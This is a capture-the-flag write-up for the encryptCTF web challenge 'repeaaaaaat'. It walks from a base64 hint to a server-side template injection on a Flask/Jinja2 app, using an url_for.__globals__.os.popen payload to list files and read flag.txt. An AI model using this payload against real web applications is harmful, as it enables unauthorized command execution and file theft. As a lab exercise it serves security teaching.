Tags: web ssti 

Rating: 0

# ▼▼▼repeaaaaaat(Web:150、123/696=17.7%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

---

```
Can you repeaaaaaat?

http://104.154.106.182:5050

author: codacker
```

---

```
GET / HTTP/1.1
Host: 104.154.106.182:5050
```

```
HTTP/1.1 200 OK
Server: gunicorn/19.9.0
Date: Thu, 04 Apr 2019 14:02:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1243

<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>repeaaaaaat</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<script>
function repeat() {
for(var i=0; i<10; i++) {
lol = document.createElement("img")
lol.src = "/static/lol.png"
var shit = document.getElementById('shit')
shit.appendChild(lol)
}
}
</script>
</head>
<body onscroll=repeat()>
Hello,<div id="shit">














</div>

</body>
</html>
```

`Lz9zZWNyZXQ9ZmxhZw==`

↓ decode by base64

`/?secret=flag`

---

## 【Try1: access /?secret=flag】

```
GET /?secret=flag HTTP/1.1
Host: 104.154.106.182:5050
```

```
HTTP/1.1 200 OK
Server: gunicorn/19.9.0
Date: Thu, 04 Apr 2019 14:05:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1247

<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>repeaaaaaat</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<script>
function repeat() {
for(var i=0; i<10; i++) {
lol = document.createElement("img")
lol.src = "/static/lol.png"
var shit = document.getElementById('shit')
shit.appendChild(lol)
}
}
</script>
</head>
<body onscroll=repeat()>
Hello,<div id="shit">














</div> flag

</body>
</html>
```

The character of flag is reflected!!

---

## 【Try2: SSTI(Server Side Template Injection)】

```
GET /?secret={{7*7}} HTTP/1.1
Host: 104.154.106.182:5050
```

`49`

SSTI vulnerability exists!!

---

## 【Try3: Execute an arbitrary command using SSTI】

```
GET /?secret={{url_for.__globals__.os.popen('ls').read()}} HTTP/1.1
Host: 104.154.106.182:5050
```

```
flag.txt
requirements.txt
static
templates
```

---

## 【Try3: Read flag.txt using SSTI】

```
GET /?secret={{url_for.__globals__.os.popen('cat%20flag.txt').read()}} HTTP/1.1
Host: 104.154.106.182:5050
```

`encryptCTF{!nj3c7!0n5_4r3_b4D}`